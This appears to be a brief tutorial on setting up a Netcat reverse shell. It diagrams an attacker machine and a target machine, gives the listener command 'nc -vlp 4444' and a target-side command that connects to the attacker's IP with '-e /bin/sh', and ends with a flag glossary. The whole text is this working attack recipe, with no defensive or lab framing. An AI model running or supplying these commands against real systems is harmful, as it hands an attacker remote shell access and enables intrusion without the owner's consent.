


Setting up Netcat Reverse Shells

Setup a Netcat listener.
Connect to the Netcat listener from the target host.
Issue commands on the target host from the attack box.

Attacker machine |                                           |   Target Machine
192.168.2.1      |   <<---------tcp connection----------     |   192.168.55.30
nc -vlp 4444    |                                           |   nc 192.168.2.1(Attaker IP) 4444 -e /bin/sh
listining port   |                                           |   connecting port



where
 
v ---- verbose
l ---- listining
p ---- port
4444 ---- port number
-e   ------ execution

/bin/bash ---- path of shell








